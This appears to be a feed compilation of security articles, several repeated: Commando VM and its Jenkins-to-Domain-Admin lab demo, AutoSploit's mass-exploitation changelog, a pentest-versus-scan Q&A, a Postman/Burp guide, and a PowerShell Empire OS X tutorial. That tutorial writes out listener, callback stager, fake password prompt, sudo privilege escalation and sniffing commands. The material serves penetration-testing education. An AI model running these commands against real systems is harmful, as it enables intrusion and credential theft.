“Penetration testers commonly use their own variants of Windows machines when assessing Active Directory environments. Commando VM was designed specifically to be the go-to platform for performing these internal penetration tests.” reads the post published by FireEye. “The benefits of using a Windows machine include native support for Windows and Active Directory, using your VM as a staging area for C2 frameworks, browsing shares more easily (and interactively), and using tools such as PowerView and BloodHound without having to worry about placing output files on client assets.”

Commando VM uses Boxstarter, Chocolatey, and MyGet packages to install all software packages, users need at least 60 GB of free hard drive space and 2GB of RAM to use it.

Commando VM automatically installs more than 140 hacking tools, including Nmap, Wireshark, Remote Server Administration Tools, Mimikatz, Burp-Suite, x64db, Metasploit, PowerSploit, Hashcat, and Owasp ZAP.

Commando VM

Experts that want to use Windows OS in penetration testing activities have to manually install hacking tools on Windows, a task that could hide many difficulties for most users.

Commando VM allows downloading additional offensive and red team tools on Windows bypassing security features implemented by Microsoft that flag them as malicious. The installer disables many Windows security features, its execution will leave a system vulnerable for this reason FireEye strongly encourage installing it on a virtual machine.

Commando VM could be installed on Windows 7 Service Pack 1, or Windows 10, in the latter OS it allows to install more features.

One of the authors of the Commando VM explained on Reddit that it top three features are:

  • Native Windows protocol support (SMB, PowerShell, RSAT, Sysinternals, etc.)
  • Organized toolsets (Tools folder on the desktop with Info Gathering, Exploitation, Password Attacks, etc.)
  • Windows-based C2 frameworks like Covenant (dotnet) and PoshC2 (PowerShell)

“With such versatility, Commando VM aims to be the de facto Windows machine for every penetration tester and red teamer,” continues FireEye.

“The versatile tool sets included in Commando VM provide blue teams with the tools necessary to audit their networks and improve their detection capabilities. With a library of offensive tools, it makes it easy for blue teams to keep up with offensive tooling and attack trends.”

Commando VM is available for download on Github, below step by step guide to install it:

  1. Create and configure a new Windows Virtual Machine
  • Ensure VM is updated completely. You may have to check for updates, reboot, and check again until no more remain
  • Take a snapshot of your machine!
  • Download and copy install.ps1 on your newly configured machine.
  • Open PowerShell as an Administrator
  • Enable script execution by running the following command:
    • Set-ExecutionPolicy Unrestricted
  • Finally, execute the installer script as follows:
    • .\install.ps1
    • You can also pass your password as an argument:.\install.ps1 -password 2

“We believe this distribution will become the standard tool for penetration testers and look forward to continued improvement and development of the Windows attack platform.” concluded FireEye.

Pierluigi Paganini

(SecurityAffairs – Commando VM, hacking)

The post Commando VM – Using Windows for pen testing and red teaming appeared first on Security Affairs.



Security Affairs

Commando VM – Using Windows for pen testing and red teaming

Commando VM — Turn Your Windows Computer Into A Hacking Machine

FireEye released Commando VM, a Windows-based security distribution designed for penetration testers that intend to use the Microsoft OS.

FireEye released Commando VM, the Windows-based security distribution designed for penetration testing and red teaming.

FireEye today released an automated installer called Commando VM (Complete Mandiant Offensive  VM), it is an automated installation script that turns a Windows operating system into a hacking system. The installation script works on systems running on a virtual machine (VM) or even on the base system.

“Penetration testers commonly use their own variants of Windows machines when assessing Active Directory environments. Commando VM was designed specifically to be the go-to platform for performing these internal penetration tests.” reads the post published by FireEye. “The benefits of using a Windows machine include native support for Windows and Active Directory, using your VM as a staging area for C2 frameworks, browsing shares more easily (and interactively), and using tools such as PowerView and BloodHound without having to worry about placing output files on client assets.”

Commando VM uses Boxstarter, Chocolatey, and MyGet packages to install all software packages, users need at least 60 GB of free hard drive space and 2GB of RAM to use it.

Commando VM automatically installs more than 140 hacking tools, including Nmap, Wireshark, Remote Server Administration Tools, Mimikatz, Burp-Suite, x64db, Metasploit, PowerSploit, Hashcat, and Owasp ZAP.

Commando VM

Experts that want to use Windows OS in penetration testing activities have to manually install hacking tools on Windows, a task that could hide many difficulties for most users.

Commando VM allows downloading additional offensive and red team tools on Windows bypassing security features implemented by Microsoft that flag them as malicious. The installer disables many Windows security features, its execution will leave a system vulnerable for this reason FireEye strongly encourage installing it on a virtual machine.

Commando VM could be installed on Windows 7 Service Pack 1, or Windows 10, in the latter OS it allows to install more features.

One of the authors of the Commando VM explained on Reddit that it top three features are:

  • Native Windows protocol support (SMB, PowerShell, RSAT, Sysinternals, etc.)
  • Organized toolsets (Tools folder on the desktop with Info Gathering, Exploitation, Password Attacks, etc.)
  • Windows-based C2 frameworks like Covenant (dotnet) and PoshC2 (PowerShell)

“With such versatility, Commando VM aims to be the de facto Windows machine for every penetration tester and red teamer,” continues FireEye.

“The versatile tool sets included in Commando VM provide blue teams with the tools necessary to audit their networks and improve their detection capabilities. With a library of offensive tools, it makes it easy for blue teams to keep up with offensive tooling and attack trends.”

Commando VM is available for download on Github, below step by step guide to install it:

  1. Create and configure a new Windows Virtual Machine
  • Ensure VM is updated completely. You may have to check for updates, reboot, and check again until no more remain
  • Take a snapshot of your machine!
  • Download and copy install.ps1 on your newly configured machine.
  • Open PowerShell as an Administrator
  • Enable script execution by running the following command:
    • Set-ExecutionPolicy Unrestricted
  • Finally, execute the installer script as follows:
    • .\install.ps1
    • You can also pass your password as an argument:.\install.ps1 -password 2

“We believe this distribution will become the standard tool for penetration testers and look forward to continued improvement and development of the Windows attack platform.” concluded FireEye.

Pierluigi Paganini

(SecurityAffairs – Commando VM, hacking)

The post Commando VM – Using Windows for pen testing and red teaming appeared first on Security Affairs.

Commando VM — Turn Your Windows Computer Into A Hacking Machine

FireEye today released Commando VM, which according to the company, is a "first of its kind Windows-based security distribution for penetration testing and red teaming." When it comes to the best-operating systems for hackers, Kali Linux is always the first choice for penetration testers and ethical hackers. However, Kali is a Linux-based distribution, and using Linux without learning some

How Chris Thomas Paired His Passion for Blockchain With Pen Testing

Chris Thomas, X-Force Red’s blockchain security expert, has always had an interest in understanding how technologies are built and operated. As a young child, Chris’ father thought it would be enjoyable for the two to build a computer instead of buying a premanufactured one. After two attempts, the father-and-son duo successfully built Chris’ first computer. Little did they know the project would ignite Chris’ future career as a penetration tester.

At just 11 years old, Chris performed his first penetration test, hacking into his school’s network. The content of his school’s information technology class wasn’t challenging for Chris, giving him plenty of time to teach himself how to program and code. Using his self-taught knowledge, he was able to scan the school’s network and access window shares that allowed him to log in as a domain administrator. Because he has a strong moral compass, Chris communicated his findings with the school’s system administrator, who became a close ally and supported Chris’ work. Through this experience, Chris knew he wanted to become a penetration tester.

Starting a Career in Penetration Testing

After secondary school, Chris pursued and completed an undergraduate degree in programming and a graduate degree in cybersecurity. He then began his first full-time job working as a system administrator for a large technology company in Manchester, England. Chris’ knowledge was second to none, but his employer would not let him begin his career as a penetration tester with the company. It was not until Chris alpha tested and passed the CREST CRT exam that his company moved him to a junior penetration tester position.

Over the next 10 years, Chris excelled in his role as a penetration tester and became a principal consultant, serving as the technical lead on a project for a large financial institution. He and his team managed the company’s global penetration testing network and built the network access controls from scratch. In the midst of that project, Chris met Thomas MacKenzie, who is now X-Force Red’s associate partner in Europe, the Middle East and Africa.

Joining the X-Force Red Team

Chris has always been infatuated with blockchain technology since its inception and initial ties to cryptocurrency. With a passion for understanding how systems work and function, he immediately educated himself on all things blockchain and bitcoin and has continued researching and tinkering with the technologies ever since.

When Thomas joined X-Force Red, he contacted Chris about his interest in joining the team as well. Thomas knew Chris had a strong interest in blockchain and reminded him that IBM was one of the industry leaders in developing new blockchain technology. Thomas suggested that Chris become X-Force Red’s leading blockchain testing expert, an opportunity Chris accepted without hesitation.

In his current role, leading X-Force Red’s blockchain testing services, Chris combines his passion for penetration testing with his love for blockchain. The team works with clients to find weaknesses not only in the implementation and use of blockchain technology itself, but also in the connected infrastructure.

Alongside X-Force Red’s veteran hackers, who are also developers and engineers, Chris is excited to help shape the adoption and implementation of blockchain across various industries.

Learn more about X-Force Red Blockchain Testing

The post How Chris Thomas Paired His Passion for Blockchain With Pen Testing appeared first on Security Intelligence.

Commando VM: The First of Its Kind Windows Offensive Distribution


For penetration testers looking for a stable and supported Linux testing platform, the industry agrees that Kali is the go-to platform. However, if you’d prefer to use Windows as an operating system, you may have noticed that a worthy platform didn’t exist. As security researchers, every one of us has probably spent hours customizing a Windows working environment at least once and we all use the same tools, utilities, and techniques during customer engagements. Therefore, maintaining a custom environment while keeping all our tool sets up-to-date can be a monotonous chore for all. Recognizing that, we have created a Windows distribution focused on supporting penetration testers and red teamers.

Born from our popular FLARE VM that focuses on reverse engineering and malware analysis, the Complete Mandiant Offensive VM (“Commando VM”) comes with automated scripts to help each of you build your own penetration testing environment and ease the process of VM provisioning and deployment. This blog post aims to discuss the features of Commando VM, installation instructions, and an example use case of the platform. Head over to the Github to find Commando VM.

About Commando VM

Penetration testers commonly use their own variants of Windows machines when assessing Active Directory environments. Commando VM was designed specifically to be the go-to platform for performing these internal penetration tests. The benefits of using a Windows machine include native support for Windows and Active Directory, using your VM as a staging area for C2 frameworks, browsing shares more easily (and interactively), and using tools such as PowerView and BloodHound without having to worry about placing output files on client assets.

Commando VM uses Boxstarter, Chocolatey, and MyGet packages to install all of the software, and delivers many tools and utilities to support penetration testing. This list includes more than 140 tools, including:

With such versatility, Commando VM aims to be the de facto Windows machine for every penetration tester and red teamer. For the blue teamers reading this, don’t worry, we’ve got full blue team support as well! The versatile tool sets included in Commando VM provide blue teams with the tools necessary to audit their networks and improve their detection capabilities. With a library of offensive tools, it makes it easy for blue teams to keep up with offensive tooling and attack trends.


Figure 1: Full blue team support

Installation

Like FLARE VM, we recommend you use Commando VM in a virtual machine. This eases deployment and provides the ability to revert to a clean state prior to each engagement. We assume you have experience setting up and configuring your own virtualized environment. Start by creating a new virtual machine (VM) with these minimum specifications:

  • 60 GB of disk space
  • 2 GB memory

Next, perform a fresh installation of Windows. Commando VM is designed to be installed on Windows 7 Service Pack 1, or Windows 10, with Windows 10 allowing more features to be installed.

Once the Windows installation has completed, we recommend you install your specific VM guest tools (e.g., VMware Tools) to allow additional features such as copy/paste and screen resizing. From this point, all installation steps should be performed within your VM.

  1. Make sure Windows is completely updated with the latest patches using the Windows Update utility. Note: you may have to check for updates again after a restart.
  2. We recommend taking a snapshot of your VM at this point to have a clean instance of Windows before the install.
  3. Navigate to the following URL and download the compressed Commando VM repository onto your VM:
  4. Follow these steps to complete the installation of Commando VM:
    1. Decompress the Commando VM repository to a directory of your choosing.
    2. Start a new session of PowerShell with elevated privileges. Commando VM attempts to install additional software and modify system settings; therefore, escalated privileges are required for installation.
    3. Within PowerShell, change directory to the location where you have decompressed the Commando VM repository.
    4. Change PowerShell’s execution policy to unrestricted by executing the following command and answering “Y” when prompted by PowerShell:
      • Set-ExecutionPolicy unrestricted
    5. Execute the install.ps1 installation script. You will be prompted to enter the current user’s password. Commando VM needs the current user’s password to automatically login after a reboot. Optionally, you can specify the current user’s password by passing the “-password <current_user_password>” at the command line.


Figure 2: Install script running

The rest of the installation process is fully automated. Depending upon your Internet speed the entire installation may take between 2 to 3 hours to finish. The VM will reboot multiple times due to the numerous software installation requirements. Once the installation completes, the PowerShell prompt remains open waiting for you to hit any key before exiting. After completing the installation, you will be presented with the following desktop environment:


Figure 3: Desktop environment after install

At this point it is recommended to reboot the machine to ensure the final configuration changes take effect. After rebooting you will have successfully installed Commando VM! We recommend you power off the VM and then take another snapshot to save a clean VM state to use in future engagements.

Proof of Concept

Commando VM is built with the primary focus of supporting internal engagements. To showcase Commando VMs capabilities, we constructed an example Active Directory deployment. This test environment may be contrived; however, it represents misconfigurations commonly observed by Mandiant’s Red Team in real environments.

We get started with Commando VM by running network scans with Nmap.


Figure 4: Nmap scan using Commando VM

Looking for low hanging fruit, we find a host machine running an interesting web server on TCP port 8080, a port commonly used for administrative purposes. Using Firefox, we can connect to the server via HTTP over TCP port 8080.


Figure 5: Jenkins server running on host

Let’s fire up Burp Suite’s Intruder and try brute-forcing the login. We navigate to our Wordlists directory in the Desktop folder and select an arbitrary password file from within SecLists.


Figure 6: SecLists password file

After configuring Burp’s Intruder and analyzing the responses, we see that the password “admin” grants us access to the Jenkins console. Classic.


Figure 7: Successful brute-force of the Jenkins server

It’s well known that Jenkins servers come installed with a Script Console and run as NT AUTHORITY\SYSTEM on Windows systems by default. We can take advantage of this and gain privileged command execution.


Figure 8: Jenkins Script Console

Now that we have command execution, we have many options for the next step. For now, we will investigate the box and look for sensitive files. Through browsing user directories, we find a password file and a private SSH key.


Figure 9: File containing password

Let’s try and validate these credentials against the Domain Controller using CredNinja.


Figure 10: Valid credentials for a domain user

Excellent, now that we know the credentials are valid, we can run CredNinja again to see what hosts the user might have local administrative permissions on.


Figure 11: Running CredNinja to identify local administrative permissions

It looks like we only have administrative permissions over the previous Jenkins host, 192.168.38.104. Not to worry though, now that we have valid domain credentials, we can begin reconnaissance activities against the domain. By executing runas /netonly /user:windomain.local\niso.sepersky cmd.exe and entering the password, we will have an authenticated command prompt up and running.


Figure 12: cmd.exe running as WINDOMAIN\niso.sepersky

Figure 12 shows that we can successfully list the contents of the SYSVOL file share on the domain controller, confirming our domain access. Now we start up PowerShell and start share hunting with PowerView.


Figure 13: PowerView's Invoke-ShareFinder output

We are also curious about what groups and permissions are available to the user account compromised. Let’s use the Get-DomainUser module of the post-exploitation framework PowerView to retrieve user details from Active Directory. Note that Commando VM uses the “dev” branch of PowerView by default.


Figure 14: Get-DomainUser win

We also want to check for further access using the SSH key we found earlier. Looking at our port scans we identify one host with TCP port 22 open. Let’s use MobaXterm and see if we can SSH into that server.


Figure 15: SSH with MobaXterm

We access the SSH server and also find an easy path to rooting the server. However, we weren’t able to escalate domain privileges with this access. Let’s get back to share hunting, starting with that hidden Software share we saw earlier. Using File Explorer, it’s easy to browse shares within the domain.


Figure 16: Browsing shares in windomain.local

Using the output from PowerView’s Invoke-ShareFinder command, we begin digging through shares and hunting for sensitive information. After going through many files, we finally find a config.ini file with hardcoded credentials.


Figure 17: Identifying cleartext credentials in configuration file

Using CredNinja, we validate these credentials against the domain controller and discover that we have local administrative privileges!


Figure 18: Validating WINDOMAIN\svcaccount credentials

Let’s check group memberships for this user.


Figure 19: Viewing group membership of WINDOMAIN\svcaccount

Lucky us, we’re a member of the “Domain Admins” group!

Final Thoughts

All of the tools used in the demo are installed on the VM by default, as well as many more. For a complete list of tools, and for the install script, please see the Commando VM Github repo. We are looking forward to addressing user feedback, adding more tools and features, and creating many enhancements. We believe this distribution will become the standard tool for penetration testers and look forward to continued improvement and development of the Windows attack platform.

Whitehat settings allow white hat hackers to Test Facebook mobile apps

Facebook introduced new settings designed to make it easier for cyber experts to test the security of its mobile applications.

Facebook has announced the implementation of new settings to make it easier for white hat hackers to test the security of its mobile applications.

To protect Facebook users, the mobile apps of the company implement security mechanisms such as Certificate Pinning that ensures the integrity and confidentiality of the traffic sent from the user device to Facebook servers.

While measures like the certificate pinning improve the overall security of the platform, they make it harder for experts to test Facebook mobile apps for server-side security bugs.

Facebook has decided to introduce new settings that white hat hackers can change on their own accounts so that they can inspect network traffic associated with Facebook, Messenger. and Instagram applications during testing sessions.

“Today we are pleased to announce that we heard the feedback and implemented a means for security researchers to analyze network traffic on Facebook, Messenger and Instagram Android applications on their own accounts for bug bounty purposes.” reads the announcement published by Facebook.

“We advise turning these settings off while not testing our website for security vulnerabilities.”

Facebook settings

Security experts who want test security features of the Facebook mobile apps have to enable the “Whitehat settings” in the web-based version of Facebook and then in the mobile application.

Once the users have enabled the ‘Whitehat Settings,’ a button will be displayed in the selected app’s menu and an alert is displayed at the top of the screen to warn that traffic may be monitored.

Pierluigi Paganini

(SecurityAffairs – Facebook Whitehat settings, penetration testing)

The post Whitehat settings allow white hat hackers to Test Facebook mobile apps appeared first on Security Affairs.

Security Affairs: Whitehat settings allow white hat hackers to Test Facebook mobile apps

Facebook introduced new settings designed to make it easier for cyber experts to test the security of its mobile applications.

Facebook has announced the implementation of new settings to make it easier for white hat hackers to test the security of its mobile applications.

To protect Facebook users, the mobile apps of the company implement security mechanisms such as Certificate Pinning that ensures the integrity and confidentiality of the traffic sent from the user device to Facebook servers.

While measures like the certificate pinning improve the overall security of the platform, they make it harder for experts to test Facebook mobile apps for server-side security bugs.

Facebook has decided to introduce new settings that white hat hackers can change on their own accounts so that they can inspect network traffic associated with Facebook, Messenger. and Instagram applications during testing sessions.

“Today we are pleased to announce that we heard the feedback and implemented a means for security researchers to analyze network traffic on Facebook, Messenger and Instagram Android applications on their own accounts for bug bounty purposes.” reads the announcement published by Facebook.

“We advise turning these settings off while not testing our website for security vulnerabilities.”

Facebook settings

Security experts who want test security features of the Facebook mobile apps have to enable the “Whitehat settings” in the web-based version of Facebook and then in the mobile application.

Once the users have enabled the ‘Whitehat Settings,’ a button will be displayed in the selected app’s menu and an alert is displayed at the top of the screen to warn that traffic may be monitored.

Pierluigi Paganini

(SecurityAffairs – Facebook Whitehat settings, penetration testing)

The post Whitehat settings allow white hat hackers to Test Facebook mobile apps appeared first on Security Affairs.



Security Affairs

UPDATE: AutoSploit 3.0 – The New Year’s edition

PenTestIT RSS Feed

I wrote about AutoSploit in a post titled AutoSploit = Shodan/Censys/Zoomeye + Metasploit and it’s subsequent update to AutoSploit 2.2. Recently, AutoSploit 3.0 was released. This post tries to describe the changes between the last release and the newest version as this release adds a number of features and bug fixes. This release is code named – The New Year’s edition!

AutoSploit 3.0

What is AutoSploit?

AutoSploit stands for Automated Mass Exploiter. It attempts to automate the exploitation of remote hosts. Targets can be collected automatically through Shodan, Censys or Zoomeye. But options to add your custom targets and host lists have been included as well. The available Metasploit modules have been selected to facilitate Remote Code Execution and to attempt to gain Reverse TCP Shells and/or Meterpreter sessions.

AutoSploit 3.0 Changelog:

This release fixes a few bugs. A brief about them:

New Features

  • New Terminal. Now also supports;
    • Custom Commands
    • Command History
    • Native binary execution (/bin & /sbin)
  • Host file backup support
  • Options to renew or reset API tokens

Bug Fixes:

The following issues are now resolved:

  • #213: Unhandled Exception (2c39b844a)
  • #219: Unhandled Exception (c7a9d05a9) : argument of type ‘int’ is not iterable
  • #221: Unhandled Exception (18733e7e2) : [Errno 17] File exists: ‘/home/mental/Desktop/Sec/AutoSploit/autosploit_out/2018-10-26_13h13m45s/’
  • #224: Unhandled Exception (c395b62f5) : [Errno 2] No such file or directory: ”
  • #225: Unhandled Exception (471b81ae6) : HTTPSConnectionPool(host=’api.zoomeye.org’, port=443): Max retries exceeded with url: /user/login (Caused by SSLError(SSLError(1, u'[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:726)’),))
  • #240: Unhandled Exception (2fd7b91c2)
  • #250: Unhandled Exception (e700f5322) : ‘access_token’

Download AutoSploit 3.0:

AutoSploit 3.0 (AutoSploit-3.0.zip/AutoSploit-3.0.tar.gz) can be downloaded from here. Another way is to perform a git pull on the directory to get everything from the source repository.


The post UPDATE: AutoSploit 3.0 – The New Year’s edition appeared first on PenTestIT.

Vulnerability Assessments Versus Penetration Tests: A Common Misconception

X-Force Red is an autonomous team of veteran hackers within IBM Security that is hired to break into organizations and uncover risky vulnerabilities that criminal attackers may use for personal gain. Our team recently unveiled new statistics collected from its penetration testing engagements. One statistic that stood out, although not surprisingly, was that out of 1,176 phishing emails sent to employees within five organizations from October 2017 to November 2018, 198 people clicked on the malicious link inside the email and 196 people submitted valid credentials.

While those numbers do not appear significantly high, they still show that criminals had 196 unique opportunities to move around inside a target organization and access sensitive data. And considering one set of valid credentials is all it might take for a criminal to launch an attack, 196 of them is a gold mine.

These security mistakes are the types of vulnerabilities that can be identified by penetration testers. On the other hand, vulnerability assessments, which typically require an automated scanning tool, are designed to identify known system vulnerabilities. However, despite those differences, some vendors, cybersecurity professionals, marketing teams and others often use the terms “penetration testing” and “vulnerability assessment” interchangeably, mixing two completely different security engagements.

It’s a misconception that should be corrected so that security professionals understand exactly what they are buying and receiving and how that investment will help solve the challenge at hand. If they are unwittingly misled into buying the wrong solution for their environment, a critical unknown vulnerability exposing a high-value asset could be missed.

A Q&A With X-Force Red Penetration Testing Consultant Seth Glasgow

Seth Glasgow, an X-Force Red penetration testing consultant, has participated in many conversations with clients and security professionals where he has had to clarify the difference between vulnerability assessments and penetration testing. I chatted with Seth about the misconception, including how it came to be and what the difference is between penetration testing and vulnerability assessments.

Question: Seth, thank you for chatting with me about this topic. Can you provide more details about how some in the industry use penetration testing and vulnerability assessments interchangeably?

Glasgow: Sure, Abby. Some vendors, security professionals and others in the industry believe penetration testing is a substitute for vulnerability scanning, or vice versa. Basically, they say they don’t need both; they need one or the other. Sometimes, the two names alone cause confusion. Some may say “vulnerability testing” or “penetration scanning.” Others may say they offer penetration testing, but it’s really just an automated scan that can find known vulnerabilities. It does not involve actual manual testing.

To cover all your bases, it’s best to use a combination of manual penetration testing and vulnerability assessments. I like to compare it to clubs in a golf bag. Not every club is needed for every shot, but to play the whole game, you need all of them.

I like that analogy. How do you think this mixing of the two terms came to be? Was it marketing-related where marketers used the same language to describe the different solutions?

Glasgow: There are a few reasons, none of which began with marketing. One is related to compliance. Some mandates lump penetration testing and vulnerability assessments into one requirement, which muddies the water. At a technical level, the conversations are like a game of telephone. Information is repeated in the wrong context, and before you know it, a vendor is offering to sell a low-cost “penetration test,” but it’s really an automated scan. Also, in the past, the two terms could have been used interchangeably based on the threat and vulnerability landscape at the time. Whereas today, the two are very different and solve different problems.

Can you provide an example of how the evolution of the industry has caused significant differentiation between the two?

Glasgow: Sure, I have a couple examples. In the past, before the cloud became popular, most companies worked with physical servers. A vulnerability assessment, which involved scanning servers before they went into production, was often all that was needed to find critical vulnerabilities and make sure they were patched. After all, the servers were managed locally, making it somewhat easier to control the security around them (such as who can access them). Today, an increasing number of companies are migrating to the cloud, which has a large variety of other security implications. At a minimum, this means more server configurations need to be set up, and there can be less control and visibility into who’s accessing which data from which network. In this new security environment, penetration testing is essential in identifying configuration and access control vulnerabilities and can link those vulnerabilities together to show how an attacker could leverage them to compromise a cloud environment.

Another example is with the Payment Card Industry Data Security Standard (PCI DSS). Companies could comply with older versions of the standard by just doing a vulnerability assessment and possibly a light penetration test. However, in the PCI DSS version 3.2, the requirements specify companies implement a penetration testing methodology (see requirement 11.3) and say companies must “validate segmentation,” which can only be done by performing a manual penetration test.

So, what is the difference between the two? Can you break it down for us?

Glasgow: Whereas vulnerability scanning is 10 miles wide and one mile deep, penetration testing is 10 miles deep and one mile wide. Vulnerability assessments involve automated scanning, which cast a wide net across the entire network. Scanning evaluates every in-scope system to identify known vulnerabilities. Vulnerability assessments review systems for patching and security configuration items that represent security risk. They also include confirmation that the vulnerabilities are real and not false positives; however, they do not include exploitation of the vulnerability. Frequent assessments are important because they enable companies to understand what their attack surface looks like on a regular basis. The vulnerability landscape is constantly evolving as new discoveries are made and patches are released. I could scan a system today and have a clean bill of health, but I could scan that same system next month and find critical vulnerabilities.

Penetration testing is a manual exercise that focuses on identifying and exploiting vulnerabilities within the in-scope networks and applications. It can assess all facets of the security of a company, including networks, applications, hardware, devices and human interactions. The facets to test are decided prior to the engagement. Testing involves hackers actively exploiting vulnerabilities, emulating how a criminal would leverage and link vulnerabilities together to move laterally and/or deeper into the network to access the crown jewels. As testers, we are less concerned about vulnerabilities we cannot exploit, or those that don’t lead to anywhere valuable.

For example, let’s say you have a webpage that hosts an online brochure and has minimal user engagement. A vulnerability assessment will treat that page the same as if it were a webpage with a high level of user engagement. A penetration test would not focus on that page because the testers know it wouldn’t lead them to a highly valuable place. They may be able to use information from the brochure to move elsewhere within the network; however, they would focus on other components that would give them the most access.

Think of it this way: A vulnerability assessment identifies if the office doors in a building are unlocked. A penetration test identifies what criminals would do once they are inside the office.

Chart demonstrating characteristisc of vulnerability assessments vs. penetration testing

Figure 1: Top differentiators between vulnerability assessments and penetration testing (source: X-Force Red)

I have one final question: If I am a cybersecurity leader looking for penetration testing services, which red flags should I look for that may indicate a vendor is actually offering a vulnerability assessment but says it’s a penetration test?

Glasgow: Be wary of the timeline. A good penetration test doesn’t adhere to a strict timeline, but it should take at least a week’s worth of work. And that’s on the low end. If a vendor is saying they can perform a test with a much quicker turnaround, that’s a sign they are probably going to use an automated scanning tool and quickly send you a report of all the findings. Also, ask about the deliverable. What kind of information will be in the findings report? If it’s a spreadsheet with scan results, that’s a sign it’s a vulnerability assessment. A penetration testing report typically includes the findings, a detailed narrative of what the testers did and remediation recommendations.

The report should also include the types of testing performed to help ensure security professionals know where remediation emphasis should be placed to make a network more difficult for hackers to gain access, maintain access and exfiltrate data.

Download the free white paper, “Penetration Testing: Protect Critical Assets Using an Attacker’s Mindset,”

The post Vulnerability Assessments Versus Penetration Tests: A Common Misconception appeared first on Security Intelligence.

Eyewitness – Open Source Target Visualization and Recon Tool

Got a huge list of targets that you’d like to enumerate but can’t really visit each and every IP individually

Eyewitness – Open Source Target Visualization and Recon Tool on Latest Hacking News.

Better API Penetration Testing with Postman – Part 2

In Part 1 of this series, I walked through an introduction to Postman, a popular tool for API developers that makes it easier to test API calls. We created a collection, and added a request to it. We also talked about how Postman handles cookies – which is essentially the same way a browser does. In this part, we’ll tailor it a bit more toward penetration testing, by proxying Postman through Burp. And in the upcoming parts 3 and 4, we’ll deal with more advanced usage of Postman, and using Burp Extensions to augment Postman, respectively.

Why proxy?

By using Postman, we have its benefits as a superior tool for crafting requests from scratch, and managing them. By proxying it through Burp, we gain its benefits: we can fuzz with intruder, we have the passive scanner highlighting issues for us, we can leverage Burp extensions as we will see in Part 4 of this series. And we can use Repeater for request tampering. Yes, it’s true that we could do our tampering in Postman. There are two strong reasons to use Repeater for it: 1) Postman is designed to issue correct, valid requests. Under some circumstances, it will try to correct malformed syntax. When testing for security issues, we may not want it trying to correct us. 2) By using Repeater, we maintain a healthy separation between our clean-state request in Postman, and our tampered requests in Repeater.

Setting up Burp Suite

An actual introduction to burp is outside the scope of this particular post. If you’re reading this, it’s likely you’re already familiar with it – we aren’t doing anything exotic or different for API testing.
If you’re unfamiliar with it, here are some resources:

Now, launch Burp, check the Proxy -> Options tab.
The top section is Proxy Listeners, and you should see a listener on 127.0.0.1, port 8080. It must be Running (note the checkbox). If it’s not running by default, that typically means the port is not available, and you will want to change the listener (and Postman) to a different port. As long as Burp is listening on the same port Postman is trying to proxy through, your setup should work.

Also check the Proxy -> Intercept tab and verify that Intercept is off.

Configuring Postman to Proxy through Burp

Postman is proxy-aware, which means we want to point it at our man-in-the-middle-proxy, which is Burp Suite (my tool of choice) for this post. We’ll open the Settings dialog by clicking the Wrench icon in the top-right (1) and then Settings option on its drop-down menu (2).
This will open a large Settings dialog with tabs across the top for the different categories of settings. Locate the Proxy tab and click it to navigate.

Opening the Postman Settings pane

There are 3 things to do on this tab:

  1. Turn On the Global Proxy Configuration switch.
  2. Turn Off the Use System Proxy switch.
  3. Set the Proxy Server IP address and port to match your Burp Suite proxy interface.
Proxy Settings Tab – Pointing Postman at your Burp Suite listener

The default proxy interface will be 127.0.0.1, port 8080 assuming you are running Burp Suite on the same machine as Postman. If you want to use a different port, you will need to specify it here and make sure it’s set to match the proxy interface in Burp.

Now that you are able to proxy traffic, there’s one more hurdle to consider. Today, SSL/TLS is used on most public APIs. This is a very good thing, but it means when Burp man-in-the-middles the Postman’s API requests and responses, you will get certificate errors unless your Burp Certificate Authority is trusted by your system. There are two options to fix this:

  1. You can turn off certificate validation in Postman. Under the General settings tab, there’s an SSL certification verification option. Setting it to Off will make Postman ignore any certificate issues, including the fact that your Burp Suite instance’s PortSwigger CA is untrusted.
  2. You can trust your Burp Suite CA to your system trust store. The specifics of how to do this are platform specific.
    PortSwigger’s documentation for it is here: https://support.portswigger.net/customer/portal/articles/1783075-Installing_Installing%20CA%20Certificate.html

Verify that it is working

Issue some requests in Postman. Check your HTTP History on the Proxy tab in Burp.

Proxy history in Burp Suite

Troubleshooting

  • Your request is stalling and timing out? Verify that Intercept is Off on the Proxy tab in Burp. Check that your proxy settings in Postman match the Proxy Interface in Burp.
  • Postman is getting responses but they aren’t showing in the Proxy History (etc) in Burp? Check the Settings in Postman to verify that Global Proxy Config is turned on. Make sure you haven’t activated a filter on the History in Burp that would filter out all of your requests. Also make sure your scope is set, if you’re not capturing out-of-scope traffic.

Next Steps

So this was two posts of pretty elementary setup type activity. Now that we have our basic tool-chain setup, we’re ready for some more advanced stuff. Part 3 will deal with variables in Postman, and how they can simplify your life. It will also dig into the scripting interface, and how to use it to simplify interactions with more common, modern approaches to Auth, such as Bearer tokens.

OSX Exploitation with Powershell Empire

This article is another post in the empire series. In this article, we will learn OSX Penetration testing using empire.

Table of Content

Exploiting MAC

Post Exploitation

  • Phishing
  • Privilege Escalation
  • Sniffing

Exploiting MAC

Here I’m considering you know PowerShell Empire’s basics, therefore, we will create the listener first using the following commands:

uselistener http
set Host http://192.168.1.26
execute

Executing the above commands will start up the listener as shown in the image above. Now the next step is to create a stager for OS X. And for that, type :

usestager osx/launcher
execute

As you can see in the image above, the above stager will generate a code. Execute this code in the target system i.e. OS X and after the execution, you will have your session as shown in the image below :

Post Exploitation

Phishing

As we have the session of our mac, there are few post exploits that can use to our advantage. The first post exploitation module we will use is a collection/osx/prompt. Using this module will ask the user to enter their password to their Apple ID, which means this module does not work in stealth mode. To use this module type :

usemodule collection/osx/prompt
execute

Executing the above module will open a prompt in the target machine as shown in the image below and when entered password you have it in clear text as shown in the image above.

Privilege Escalation

For the privilege escalation of OS X, we have used the module privesc/multi/sudo_spawn. To sue this module type :

usemodule privesc/multi/sudo_spawn
set Listener http
set Password toor
execute

Executing this module will give you admin rights with a new session, as you can see in the image below :

Sniffing

The module we will use is collection/osx/sniffer. This will sniff around all the traffic in the coming to and going from our target system and give us all the necessary details by creating a pcap file.  To use module type :

usemodule collection/osx/sniffer
execute

As you can see that you will even find the password in clear text in the pcap file as shown in the image below :

Next post module is of taking a screenshot of the target system and to use the said module type :

usemodule collection/osx/screenshot
execute

The above module will take a screenshot as shown in the image below :

There is a further number of post modules which you can use and experiment with as shown in the image below :

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher  Contact Here

The post OSX Exploitation with Powershell Empire appeared first on Hacking Articles.

Security Misconfigurations

